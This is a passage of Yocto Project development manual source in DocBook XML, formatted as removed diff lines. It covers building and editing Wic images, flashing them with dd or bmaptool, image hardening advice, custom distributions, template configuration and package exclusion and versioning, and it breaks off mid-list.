- /home/stephano/poky/scripts/lib/wic/canned-wks/directdisksdb-gpt.wks
- </literallayout>
- Next, the example modifies the
- <filename>directdisksdb-gpt.wks</filename> file and
- changes all instances of
- "<filename>--ondisk sda</filename>" to
- "<filename>--ondisk sdb</filename>".
- The example changes the following two lines and leaves
- the remaining lines untouched:
- <literallayout class='monospaced'>
- part /boot --source bootimg-pcbios --ondisk sdb --label boot --active --align 1024
- part / --source rootfs --ondisk sdb --fstype=ext4 --label platform --align 1024 --use-uuid
- </literallayout>
- Once the lines are changed, the example generates the
- <filename>directdisksdb-gpt</filename> image.
- The command points the process at the
- <filename>core-image-minimal</filename> artifacts for
- the Next Unit of Computing (nuc)
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>
- the <filename>local.conf</filename>.
- <literallayout class='monospaced'>
- $ wic create directdisksdb-gpt -e core-image-minimal
- INFO: Building wic-tools...
- .
- .
- .
- Initialising tasks: 100% |#######################################| Time: 0:00:01
- NOTE: Executing SetScene Tasks
- NOTE: Executing RunQueue Tasks
- NOTE: Tasks Summary: Attempted 1161 tasks of which 1157 didn't need to be rerun and all succeeded.
- INFO: Creating image(s)...
-
- INFO: The new image(s) can be found here:
- ./directdisksdb-gpt-201710090938-sdb.direct
-
- The following build artifacts were used to create the image(s):
- ROOTFS_DIR: /home/stephano/build/master/build/tmp-glibc/work/qemux86-oe-linux/core-image-minimal/1.0-r0/rootfs
- BOOTIMG_DIR: /home/stephano/build/master/build/tmp-glibc/work/qemux86-oe-linux/core-image-minimal/1.0-r0/recipe-sysroot/usr/share
- KERNEL_DIR: /home/stephano/build/master/build/tmp-glibc/deploy/images/qemux86
- NATIVE_SYSROOT: /home/stephano/build/master/build/tmp-glibc/work/i586-oe-linux/wic-tools/1.0-r0/recipe-sysroot-native
-
- INFO: The image(s) were created using OE kickstart file:
- /home/stephano/poky/scripts/lib/wic/canned-wks/directdisksdb-gpt.wks
- </literallayout>
- Continuing with the example, you can now directly
- <filename>dd</filename> the image to a USB stick, or
- whatever media for which you built your image,
- and boot the resulting media:
- <literallayout class='monospaced'>
- $ sudo dd if=directdisksdb-gpt-201710090938-sdb.direct of=/dev/sdb
- 140966+0 records in
- 140966+0 records out
- 72174592 bytes (72 MB, 69 MiB) copied, 78.0282 s, 925 kB/s
- $ sudo eject /dev/sdb
- </literallayout>
- </para>
- </section>
-
- <section id='using-a-modified-kickstart-file-and-running-in-raw-mode'>
- <title>Using a Modified Kickstart File and Running in Raw Mode</title>
-
- <para>
- This next example manually specifies each build artifact
- (runs in Raw Mode) and uses a modified kickstart file.
- The example also uses the <filename>-o</filename> option
- to cause Wic to create the output
- somewhere other than the default output directory,
- which is the current directory:
- <literallayout class='monospaced'>
- $ wic create /home/stephano/my_yocto/test.wks -o /home/stephano/testwic \
- --rootfs-dir /home/stephano/build/master/build/tmp/work/qemux86-poky-linux/core-image-minimal/1.0-r0/rootfs \
- --bootimg-dir /home/stephano/build/master/build/tmp/work/qemux86-poky-linux/core-image-minimal/1.0-r0/recipe-sysroot/usr/share \
- --kernel-dir /home/stephano/build/master/build/tmp/deploy/images/qemux86 \
- --native-sysroot /home/stephano/build/master/build/tmp/work/i586-poky-linux/wic-tools/1.0-r0/recipe-sysroot-native
-
- INFO: Creating image(s)...
-
- INFO: The new image(s) can be found here:
- /home/stephano/testwic/test-201710091445-sdb.direct
-
- The following build artifacts were used to create the image(s):
- ROOTFS_DIR: /home/stephano/build/master/build/tmp-glibc/work/qemux86-oe-linux/core-image-minimal/1.0-r0/rootfs
- BOOTIMG_DIR: /home/stephano/build/master/build/tmp-glibc/work/qemux86-oe-linux/core-image-minimal/1.0-r0/recipe-sysroot/usr/share
- KERNEL_DIR: /home/stephano/build/master/build/tmp-glibc/deploy/images/qemux86
- NATIVE_SYSROOT: /home/stephano/build/master/build/tmp-glibc/work/i586-oe-linux/wic-tools/1.0-r0/recipe-sysroot-native
-
- INFO: The image(s) were created using OE kickstart file:
- /home/stephano/my_yocto/test.wks
- </literallayout>
- For this example,
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink>
- did not have to be specified in the
- <filename>local.conf</filename> file since the
- artifact is manually specified.
- </para>
- </section>
-
- <section id='using-wic-to-manipulate-an-image'>
- <title>Using Wic to Manipulate an Image</title>
-
- <para>
- Wic image manipulation allows you to shorten turnaround
- time during image development.
- For example, you can use Wic to delete the kernel partition
- of a Wic image and then insert a newly built kernel.
- This saves you time from having to rebuild the entire image
- each time you modify the kernel.
- <note>
- In order to use Wic to manipulate a Wic image as in
- this example, your development machine must have the
- <filename>mtools</filename> package installed.
- </note>
- </para>
-
- <para>
- The following example examines the contents of the Wic
- image, deletes the existing kernel, and then inserts a
- new kernel:
- <orderedlist>
- <listitem><para>
- <emphasis>List the Partitions:</emphasis>
- Use the <filename>wic ls</filename> command to list
- all the partitions in the Wic image:
- <literallayout class='monospaced'>
- $ wic ls tmp/deploy/images/qemux86/core-image-minimal-qemux86.wic
- Num Start End Size Fstype
- 1 1048576 25041919 23993344 fat16
- 2 25165824 72157183 46991360 ext4
- </literallayout>
- The previous output shows two partitions in the
- <filename>core-image-minimal-qemux86.wic</filename>
- image.
- </para></listitem>
- <listitem><para>
- <emphasis>Examine a Particular Partition:</emphasis>
- Use the <filename>wic ls</filename> command again
- but in a different form to examine a particular
- partition.
- <note>
- You can get command usage on any Wic command
- using the following form:
- <literallayout class='monospaced'>
- $ wic help <replaceable>command</replaceable>
- </literallayout>
- For example, the following command shows you
- the various ways to use the
- <filename>wic ls</filename> command:
- <literallayout class='monospaced'>
- $ wic help ls
- </literallayout>
- </note>
- The following command shows what is in Partition
- one:
- <literallayout class='monospaced'>
- $ wic ls tmp/deploy/images/qemux86/core-image-minimal-qemux86.wic:1
- Volume in drive : is boot
- Volume Serial Number is E894-1809
- Directory for ::/
-
- libcom32 c32 186500 2017-10-09 16:06
- libutil c32 24148 2017-10-09 16:06
- syslinux cfg 220 2017-10-09 16:06
- vesamenu c32 27104 2017-10-09 16:06
- vmlinuz 6904608 2017-10-09 16:06
- 5 files 7 142 580 bytes
- 16 582 656 bytes free
- </literallayout>
- The previous output shows five files, with the
- <filename>vmlinuz</filename> being the kernel.
- <note>
- If you see the following error, you need to
- update or create a
- <filename>~/.mtoolsrc</filename> file and
- be sure to have the line “mtools_skip_check=1“
- in the file.
- Then, run the Wic command again:
- <literallayout class='monospaced'>
- ERROR: _exec_cmd: /usr/bin/mdir -i /tmp/wic-parttfokuwra ::/ returned '1' instead of 0
- output: Total number of sectors (47824) not a multiple of sectors per track (32)!
- Add mtools_skip_check=1 to your .mtoolsrc file to skip this test
- </literallayout>
- </note>
- </para></listitem>
- <listitem><para>
- <emphasis>Remove the Old Kernel:</emphasis>
- Use the <filename>wic rm</filename> command to
- remove the <filename>vmlinuz</filename> file
- (kernel):
- <literallayout class='monospaced'>
- $ wic rm tmp/deploy/images/qemux86/core-image-minimal-qemux86.wic:1/vmlinuz
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Add In the New Kernel:</emphasis>
- Use the <filename>wic cp</filename> command to
- add the updated kernel to the Wic image.
- Depending on how you built your kernel, it could
- be in different places.
- If you used <filename>devtool</filename> and
- an SDK to build your kernel, it resides in the
- <filename>tmp/work</filename> directory of the
- extensible SDK.
- If you used <filename>make</filename> to build the
- kernel, the kernel will be in the
- <filename>workspace/sources</filename> area.
- </para>
-
- <para>The following example assumes
- <filename>devtool</filename> was used to build
- the kernel:
- <literallayout class='monospaced'>
- cp ~/poky_sdk/tmp/work/qemux86-poky-linux/linux-yocto/4.12.12+git999-r0/linux-yocto-4.12.12+git999/arch/x86/boot/bzImage \
- ~/poky/build/tmp/deploy/images/qemux86/core-image-minimal-qemux86.wic:1/vmlinuz
- </literallayout>
- Once the new kernel is added back into the image,
- you can use the <filename>dd</filename>
- command or
- <link linkend='flashing-images-using-bmaptool'><filename>bmaptool</filename></link>
- to flash your wic image onto an SD card
- or USB stick and test your target.
- <note>
- Using <filename>bmaptool</filename> is
- generally 10 to 20 times faster than using
- <filename>dd</filename>.
- </note>
- </para></listitem>
- </orderedlist>
- </para>
- </section>
- </section>
- </section>
-
- <section id='flashing-images-using-bmaptool'>
- <title>Flashing Images Using <filename>bmaptool</filename></title>
-
- <para>
- A fast and easy way to flash an image to a bootable device
- is to use Bmaptool, which is integrated into the OpenEmbedded
- build system.
- Bmaptool is a generic tool that creates a file's block map (bmap)
- and then uses that map to copy the file.
- As compared to traditional tools such as dd or cp, Bmaptool
- can copy (or flash) large files like raw system image files
- much faster.
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- If you are using Ubuntu or Debian distributions, you
- can install the <filename>bmap-tools</filename> package
- using the following command and then use the tool
- without specifying <filename>PATH</filename> even from
- the root account:
- <literallayout class='monospaced'>
- $ sudo apt-get install bmap-tools
- </literallayout>
- </para></listitem>
- <listitem><para>
- If you are unable to install the
- <filename>bmap-tools</filename> package, you will
- need to build Bmaptool before using it.
- Use the following command:
- <literallayout class='monospaced'>
- $ bitbake bmap-tools-native
- </literallayout>
- </para></listitem>
- </itemizedlist>
- </note>
- </para>
-
- <para>
- Following, is an example that shows how to flash a Wic image.
- Realize that while this example uses a Wic image, you can use
- Bmaptool to flash any type of image.
- Use these steps to flash an image using Bmaptool:
- <orderedlist>
- <listitem><para>
- <emphasis>Update your <filename>local.conf</filename> File:</emphasis>
- You need to have the following set in your
- <filename>local.conf</filename> file before building
- your image:
- <literallayout class='monospaced'>
- IMAGE_FSTYPES += "wic wic.bmap"
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Get Your Image:</emphasis>
- Either have your image ready (pre-built with the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_FSTYPES'><filename>IMAGE_FSTYPES</filename></ulink>
- setting previously mentioned) or take the step to build
- the image:
- <literallayout class='monospaced'>
- $ bitbake <replaceable>image</replaceable>
- </literallayout>
- </para></listitem>
- <listitem><para>
- <emphasis>Flash the Device:</emphasis>
- Flash the device with the image by using Bmaptool
- depending on your particular setup.
- The following commands assume the image resides in the
- Build Directory's <filename>deploy/images/</filename>
- area:
- <itemizedlist>
- <listitem><para>
- If you have write access to the media, use this
- command form:
- <literallayout class='monospaced'>
- $ oe-run-native bmap-tools-native bmaptool copy <replaceable>build-directory</replaceable>/tmp/deploy/images/<replaceable>machine</replaceable>/<replaceable>image</replaceable>.wic /dev/sd<replaceable>X</replaceable>
- </literallayout>
- </para></listitem>
- <listitem><para>
- If you do not have write access to the media, set
- your permissions first and then use the same
- command form:
- <literallayout class='monospaced'>
- $ sudo chmod 666 /dev/sd<replaceable>X</replaceable>
- $ oe-run-native bmap-tools-native bmaptool copy <replaceable>build-directory</replaceable>/tmp/deploy/images/<replaceable>machine</replaceable>/<replaceable>image</replaceable>.wic /dev/sd<replaceable>X</replaceable>
- </literallayout>
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- </orderedlist>
- </para>
-
- <para>
- For help on the <filename>bmaptool</filename> command, use the
- following command:
- <literallayout class='monospaced'>
- $ bmaptool --help
- </literallayout>
- </para>
- </section>
-
- <section id='making-images-more-secure'>
- <title>Making Images More Secure</title>
-
- <para>
- Security is of increasing concern for embedded devices.
- Consider the issues and problems discussed in just this
- sampling of work found across the Internet:
- <itemizedlist>
- <listitem><para><emphasis>
- "<ulink url='https://www.schneier.com/blog/archives/2014/01/security_risks_9.html'>Security Risks of Embedded Systems</ulink>"</emphasis>
- by Bruce Schneier
- </para></listitem>
- <listitem><para><emphasis>
- "<ulink url='http://census2012.sourceforge.net/paper.html'>Internet Census 2012</ulink>"</emphasis>
- by Carna Botnet</para></listitem>
- <listitem><para><emphasis>
- "<ulink url='http://elinux.org/images/6/6f/Security-issues.pdf'>Security Issues for Embedded Devices</ulink>"</emphasis>
- by Jake Edge
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- When securing your image is of concern, there are steps, tools,
- and variables that you can consider to help you reach the
- security goals you need for your particular device.
- Not all situations are identical when it comes to making an
- image secure.
- Consequently, this section provides some guidance and suggestions
- for consideration when you want to make your image more secure.
- <note>
- Because the security requirements and risks are
- different for every type of device, this section cannot
- provide a complete reference on securing your custom OS.
- It is strongly recommended that you also consult other sources
- of information on embedded Linux system hardening and on
- security.
- </note>
- </para>
-
- <section id='general-considerations'>
- <title>General Considerations</title>
-
- <para>
- General considerations exist that help you create more
- secure images.
- You should consider the following suggestions to help
- make your device more secure:
- <itemizedlist>
- <listitem><para>
- Scan additional code you are adding to the system
- (e.g. application code) by using static analysis
- tools.
- Look for buffer overflows and other potential
- security problems.
- </para></listitem>
- <listitem><para>
- Pay particular attention to the security for
- any web-based administration interface.
- </para>
- <para>Web interfaces typically need to perform
- administrative functions and tend to need to run with
- elevated privileges.
- Thus, the consequences resulting from the interface's
- security becoming compromised can be serious.
- Look for common web vulnerabilities such as
- cross-site-scripting (XSS), unvalidated inputs,
- and so forth.</para>
- <para>As with system passwords, the default credentials
- for accessing a web-based interface should not be the
- same across all devices.
- This is particularly true if the interface is enabled
- by default as it can be assumed that many end-users
- will not change the credentials.
- </para></listitem>
- <listitem><para>
- Ensure you can update the software on the device to
- mitigate vulnerabilities discovered in the future.
- This consideration especially applies when your
- device is network-enabled.
- </para></listitem>
- <listitem><para>
- Ensure you remove or disable debugging functionality
- before producing the final image.
- For information on how to do this, see the
- "<link linkend='considerations-specific-to-the-openembedded-build-system'>Considerations Specific to the OpenEmbedded Build System</link>"
- section.
- </para></listitem>
- <listitem><para>
- Ensure you have no network services listening that
- are not needed.
- </para></listitem>
- <listitem><para>
- Remove any software from the image that is not needed.
- </para></listitem>
- <listitem><para>
- Enable hardware support for secure boot functionality
- when your device supports this functionality.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='security-flags'>
- <title>Security Flags</title>
-
- <para>
- The Yocto Project has security flags that you can enable that
- help make your build output more secure.
- The security flags are in the
- <filename>meta/conf/distro/include/security_flags.inc</filename>
- file in your
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
- (e.g. <filename>poky</filename>).
- <note>
- Depending on the recipe, certain security flags are enabled
- and disabled by default.
- </note>
- </para>
-
- <para>
-<!--
- The GCC/LD flags in <filename>security_flags.inc</filename>
- enable more secure code generation.
- By including the <filename>security_flags.inc</filename>
- file, you enable flags to the compiler and linker that cause
- them to generate more secure code.
- <note>
- The GCC/LD flags are enabled by default in the
- <filename>poky-lsb</filename> distribution.
- </note>
--->
- Use the following line in your
- <filename>local.conf</filename> file or in your custom
- distribution configuration file to enable the security
- compiler and linker flags for your build:
- <literallayout class='monospaced'>
- require conf/distro/include/security_flags.inc
- </literallayout>
- </para>
- </section>
-
- <section id='considerations-specific-to-the-openembedded-build-system'>
- <title>Considerations Specific to the OpenEmbedded Build System</title>
-
- <para>
- You can take some steps that are specific to the
- OpenEmbedded build system to make your images more secure:
- <itemizedlist>
- <listitem><para>
- Ensure "debug-tweaks" is not one of your selected
- <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></ulink>.
- When creating a new project, the default is to provide you
- with an initial <filename>local.conf</filename> file that
- enables this feature using the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-EXTRA_IMAGE_FEATURES'><filename>EXTRA_IMAGE_FEATURES</filename></ulink> variable with the line:
- <literallayout class='monospaced'>
- EXTRA_IMAGE_FEATURES = "debug-tweaks"
- </literallayout>
- To disable that feature, simply comment out that line in your
- <filename>local.conf</filename> file, or
- make sure <filename>IMAGE_FEATURES</filename> does not contain
- "debug-tweaks" before producing your final image.
- Among other things, leaving this in place sets the
- root password as blank, which makes logging in for
- debugging or inspection easy during
- development but also means anyone can easily log in
- during production.
- </para></listitem>
- <listitem><para>
- It is possible to set a root password for the image
- and also to set passwords for any extra users you might
- add (e.g. administrative or service type users).
- When you set up passwords for multiple images or
- users, you should not duplicate passwords.
- </para>
- <para>
- To set up passwords, use the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-extrausers'><filename>extrausers</filename></ulink>
- class, which is the preferred method.
- For an example on how to set up both root and user
- passwords, see the
- "<ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-extrausers'><filename>extrausers.bbclass</filename></ulink>"
- section.
- <note>
- When adding extra user accounts or setting a
- root password, be cautious about setting the
- same password on every device.
- If you do this, and the password you have set
- is exposed, then every device is now potentially
- compromised.
- If you need this access but want to ensure
- security, consider setting a different,
- random password for each device.
- Typically, you do this as a separate step after
- you deploy the image onto the device.
- </note>
- </para></listitem>
- <listitem><para>
- Consider enabling a Mandatory Access Control (MAC)
- framework such as SMACK or SELinux and tuning it
- appropriately for your device's usage.
- You can find more information in the
- <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/meta-selinux/'><filename>meta-selinux</filename></ulink>
- layer.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- </para>
- </section>
-
- <section id='tools-for-hardening-your-image'>
- <title>Tools for Hardening Your Image</title>
-
- <para>
- The Yocto Project provides tools for making your image
- more secure.
- You can find these tools in the
- <filename>meta-security</filename> layer of the
- <ulink url='&YOCTO_GIT_URL;'>Yocto Project Source Repositories</ulink>.
- </para>
- </section>
- </section>
-
- <section id='creating-your-own-distribution'>
- <title>Creating Your Own Distribution</title>
-
- <para>
- When you build an image using the Yocto Project and
- do not alter any distribution
- <ulink url='&YOCTO_DOCS_REF_URL;#metadata'>Metadata</ulink>,
- you are creating a Poky distribution.
- If you wish to gain more control over package alternative
- selections, compile-time options, and other low-level
- configurations, you can create your own distribution.
- </para>
-
- <para>
- To create your own distribution, the basic steps consist of
- creating your own distribution layer, creating your own
- distribution configuration file, and then adding any needed
- code and Metadata to the layer.
- The following steps provide some more detail:
- <itemizedlist>
- <listitem><para><emphasis>Create a layer for your new distro:</emphasis>
- Create your distribution layer so that you can keep your
- Metadata and code for the distribution separate.
- It is strongly recommended that you create and use your own
- layer for configuration and code.
- Using your own layer as compared to just placing
- configurations in a <filename>local.conf</filename>
- configuration file makes it easier to reproduce the same
- build configuration when using multiple build machines.
- See the
- "<link linkend='creating-a-general-layer-using-the-bitbake-layers-script'>Creating a General Layer Using the <filename>bitbake-layers</filename> Script</link>"
- section for information on how to quickly set up a layer.
- </para></listitem>
- <listitem><para><emphasis>Create the distribution configuration file:</emphasis>
- The distribution configuration file needs to be created in
- the <filename>conf/distro</filename> directory of your
- layer.
- You need to name it using your distribution name
- (e.g. <filename>mydistro.conf</filename>).
- <note>
- The
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO'><filename>DISTRO</filename></ulink>
- variable in your
- <filename>local.conf</filename> file determines the
- name of your distribution.
- </note></para>
- <para>You can split out parts of your configuration file
- into include files and then "require" them from within
- your distribution configuration file.
- Be sure to place the include files in the
- <filename>conf/distro/include</filename> directory of
- your layer.
- A common example usage of include files would be to
- separate out the selection of desired version and revisions
- for individual recipes.
-</para>
- <para>Your configuration file needs to set the following
- required variables:
- <literallayout class='monospaced'>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO_NAME'><filename>DISTRO_NAME</filename></ulink>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO_VERSION'><filename>DISTRO_VERSION</filename></ulink>
- </literallayout>
- These following variables are optional and you typically
- set them from the distribution configuration file:
- <literallayout class='monospaced'>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></ulink>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO_EXTRA_RDEPENDS'><filename>DISTRO_EXTRA_RDEPENDS</filename></ulink>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO_EXTRA_RRECOMMENDS'><filename>DISTRO_EXTRA_RRECOMMENDS</filename></ulink>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-TCLIBC'><filename>TCLIBC</filename></ulink>
- </literallayout>
- <tip>
- If you want to base your distribution configuration file
- on the very basic configuration from OE-Core, you
- can use
- <filename>conf/distro/defaultsetup.conf</filename> as
- a reference and just include variables that differ
- as compared to <filename>defaultsetup.conf</filename>.
- Alternatively, you can create a distribution
- configuration file from scratch using the
- <filename>defaultsetup.conf</filename> file
- or configuration files from other distributions
- such as Poky or Angstrom as references.
- </tip></para></listitem>
- <listitem><para><emphasis>Provide miscellaneous variables:</emphasis>
- Be sure to define any other variables for which you want to
- create a default or enforce as part of the distribution
- configuration.
- You can include nearly any variable from the
- <filename>local.conf</filename> file.
- The variables you use are not limited to the list in the
- previous bulleted item.</para></listitem>
- <listitem><para><emphasis>Point to Your distribution configuration file:</emphasis>
- In your <filename>local.conf</filename> file in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>,
- set your
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO'><filename>DISTRO</filename></ulink>
- variable to point to your distribution's configuration file.
- For example, if your distribution's configuration file is
- named <filename>mydistro.conf</filename>, then you point
- to it as follows:
- <literallayout class='monospaced'>
- DISTRO = "mydistro"
- </literallayout></para></listitem>
- <listitem><para><emphasis>Add more to the layer if necessary:</emphasis>
- Use your layer to hold other information needed for the
- distribution:
- <itemizedlist>
- <listitem><para>Add recipes for installing
- distro-specific configuration files that are not
- already installed by another recipe.
- If you have distro-specific configuration files
- that are included by an existing recipe, you should
- add an append file (<filename>.bbappend</filename>)
- for those.
- For general information and recommendations
- on how to add recipes to your layer, see the
- "<link linkend='creating-your-own-layer'>Creating Your Own Layer</link>"
- and
- "<link linkend='best-practices-to-follow-when-creating-layers'>Following Best Practices When Creating Layers</link>"
- sections.</para></listitem>
- <listitem><para>Add any image recipes that are specific
- to your distribution.</para></listitem>
- <listitem><para>Add a <filename>psplash</filename>
- append file for a branded splash screen.
- For information on append files, see the
- "<link linkend='using-bbappend-files'>Using .bbappend Files in Your Layer</link>"
- section.</para></listitem>
- <listitem><para>Add any other append files to make
- custom changes that are specific to individual
- recipes.</para></listitem>
- </itemizedlist></para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='creating-a-custom-template-configuration-directory'>
- <title>Creating a Custom Template Configuration Directory</title>
-
- <para>
- If you are producing your own customized version
- of the build system for use by other users, you might
- want to customize the message shown by the setup script or
- you might want to change the template configuration files (i.e.
- <filename>local.conf</filename> and
- <filename>bblayers.conf</filename>) that are created in
- a new build directory.
- </para>
-
- <para>
- The OpenEmbedded build system uses the environment variable
- <filename>TEMPLATECONF</filename> to locate the directory
- from which it gathers configuration information that ultimately
- ends up in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
- <filename>conf</filename> directory.
- By default, <filename>TEMPLATECONF</filename> is set as
- follows in the <filename>poky</filename> repository:
- <literallayout class='monospaced'>
- TEMPLATECONF=${TEMPLATECONF:-meta-poky/conf}
- </literallayout>
- This is the directory used by the build system to find templates
- from which to build some key configuration files.
- If you look at this directory, you will see the
- <filename>bblayers.conf.sample</filename>,
- <filename>local.conf.sample</filename>, and
- <filename>conf-notes.txt</filename> files.
- The build system uses these files to form the respective
- <filename>bblayers.conf</filename> file,
- <filename>local.conf</filename> file, and display the list of
- BitBake targets when running the setup script.
- </para>
-
- <para>
- To override these default configuration files with
- configurations you want used within every new
- Build Directory, simply set the
- <filename>TEMPLATECONF</filename> variable to your directory.
- The <filename>TEMPLATECONF</filename> variable is set in the
- <filename>.templateconf</filename> file, which is in the
- top-level
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
- folder (e.g. <filename>poky</filename>).
- Edit the <filename>.templateconf</filename> so that it can locate
- your directory.
- </para>
-
- <para>
- Best practices dictate that you should keep your
- template configuration directory in your custom distribution layer.
- For example, suppose you have a layer named
- <filename>meta-mylayer</filename> located in your home directory
- and you want your template configuration directory named
- <filename>myconf</filename>.
- Changing the <filename>.templateconf</filename> as follows
- causes the OpenEmbedded build system to look in your directory
- and base its configuration files on the
- <filename>*.sample</filename> configuration files it finds.
- The final configuration files (i.e.
- <filename>local.conf</filename> and
- <filename>bblayers.conf</filename> ultimately still end up in
- your Build Directory, but they are based on your
- <filename>*.sample</filename> files.
- <literallayout class='monospaced'>
- TEMPLATECONF=${TEMPLATECONF:-meta-mylayer/myconf}
- </literallayout>
- </para>
-
- <para>
- Aside from the <filename>*.sample</filename> configuration files,
- the <filename>conf-notes.txt</filename> also resides in the
- default <filename>meta-poky/conf</filename> directory.
- The script that sets up the build environment
- (i.e.
- <ulink url="&YOCTO_DOCS_REF_URL;#structure-core-script"><filename>&OE_INIT_FILE;</filename></ulink>)
- uses this file to display BitBake targets as part of the script
- output.
- Customizing this <filename>conf-notes.txt</filename> file is a
- good way to make sure your list of custom targets appears
- as part of the script's output.
- </para>
-
- <para>
- Here is the default list of targets displayed as a result of
- running either of the setup scripts:
- <literallayout class='monospaced'>
- You can now run 'bitbake &lt;target&gt;'
-
- Common targets are:
- core-image-minimal
- core-image-sato
- meta-toolchain
- meta-ide-support
- </literallayout>
- </para>
-
- <para>
- Changing the listed common targets is as easy as editing your
- version of <filename>conf-notes.txt</filename> in your
- custom template configuration directory and making sure you
- have <filename>TEMPLATECONF</filename> set to your directory.
- </para>
- </section>
-
- <section id='dev-saving-memory-during-a-build'>
- <title>Conserving Disk Space During Builds</title>
-
- <para>
- To help conserve disk space during builds, you can add the
- following statement to your project's
- <filename>local.conf</filename> configuration file found in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>:
- <literallayout class='monospaced'>
- INHERIT += "rm_work"
- </literallayout>
- Adding this statement deletes the work directory used for building
- a recipe once the recipe is built.
- For more information on "rm_work", see the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-rm-work'><filename>rm_work</filename></ulink>
- class in the Yocto Project Reference Manual.
- </para>
- </section>
-
- <section id='working-with-packages'>
- <title>Working with Packages</title>
-
- <para>
- This section describes a few tasks that involve packages:
- <itemizedlist>
- <listitem><para>
- <link linkend='excluding-packages-from-an-image'>Excluding packages from an image</link>
- </para></listitem>
- <listitem><para>
- <link linkend='incrementing-a-binary-package-version'>Incrementing a binary package version</link>
- </para></listitem>
- <listitem><para>
- <link linkend='handling-optional-module-packaging'>Handling optional module packaging</link>
- </para></listitem>
- <listitem><para>
- <link linkend='using-runtime-package-management'>Using runtime package management</link>
- </para></listitem>
- <listitem><para>
- <link linkend='generating-and-using-signed-packages'>Generating and using signed packages</link>
- </para></listitem>
- <listitem><para>
- <link linkend='testing-packages-with-ptest'>Setting up and running package test (ptest)</link>
- </para></listitem>
- <listitem><para>
- <link linkend='creating-node-package-manager-npm-packages'>Creating node package manager (NPM) packages</link>
- </para></listitem>
- </itemizedlist>
- </para>
-
- <section id='excluding-packages-from-an-image'>
- <title>Excluding Packages from an Image</title>
-
- <para>
- You might find it necessary to prevent specific packages
- from being installed into an image.
- If so, you can use several variables to direct the build
- system to essentially ignore installing recommended packages
- or to not install a package at all.
- </para>
-
- <para>
- The following list introduces variables you can use to
- prevent packages from being installed into your image.
- Each of these variables only works with IPK and RPM
- package types.
- Support for Debian packages does not exist.
- Also, you can use these variables from your
- <filename>local.conf</filename> file or attach them to a
- specific image recipe by using a recipe name override.
- For more detail on the variables, see the descriptions in the
- Yocto Project Reference Manual's glossary chapter.
- <itemizedlist>
- <listitem><para><ulink url='&YOCTO_DOCS_REF_URL;#var-BAD_RECOMMENDATIONS'><filename>BAD_RECOMMENDATIONS</filename></ulink>:
- Use this variable to specify "recommended-only"
- packages that you do not want installed.
- </para></listitem>
- <listitem><para><ulink url='&YOCTO_DOCS_REF_URL;#var-NO_RECOMMENDATIONS'><filename>NO_RECOMMENDATIONS</filename></ulink>:
- Use this variable to prevent all "recommended-only"
- packages from being installed.
- </para></listitem>
- <listitem><para><ulink url='&YOCTO_DOCS_REF_URL;#var-PACKAGE_EXCLUDE'><filename>PACKAGE_EXCLUDE</filename></ulink>:
- Use this variable to prevent specific packages from
- being installed regardless of whether they are
- "recommended-only" or not.
- You need to realize that the build process could
- fail with an error when you
- prevent the installation of a package whose presence
- is required by an installed package.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='incrementing-a-binary-package-version'>
- <title>Incrementing a Package Version</title>
-
- <para>
- This section provides some background on how binary package
- versioning is accomplished and presents some of the services,
- variables, and terminology involved.
- </para>
-
- <para>
- In order to understand binary package versioning, you need
- to consider the following:
- <itemizedlist>
- <listitem><para>
- Binary Package: The binary package that is eventually
- built and installed into an image.
- </para></listitem>
- <listitem><para>
- Binary Package Version: The binary package version
- is composed of two components - a version and a
- revision.
- <note>
- Technically, a third component, the "epoch" (i.e.
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PE'><filename>PE</filename></ulink>)
- is involved but this discussion for the most part
- ignores <filename>PE</filename>.
- </note>
- The version and revision are taken from the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PV'><filename>PV</filename></ulink>
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PR'><filename>PR</filename></ulink>
- variables, respectively.
- </para></listitem>
- <listitem><para>
- <filename>PV</filename>: The recipe version.
- <filename>PV</filename> represents the version of the
- software being packaged.
- Do not confuse <filename>PV</filename> with the
- binary package version.
- </para></listitem>
- <listitem><para>
- <filename>PR</filename>: The recipe revision.
- </para></listitem>
- <listitem><para>
- <ulink url='&YOCTO_DOCS_REF_URL;#var-SRCPV'><filename>SRCPV</filename></ulink>:
- The OpenEmbedded build system uses this string
- to help define the value of <filename>PV</filename>
- when the source code revision needs to be included
- in it.
- </para></listitem>
- <listitem><para>
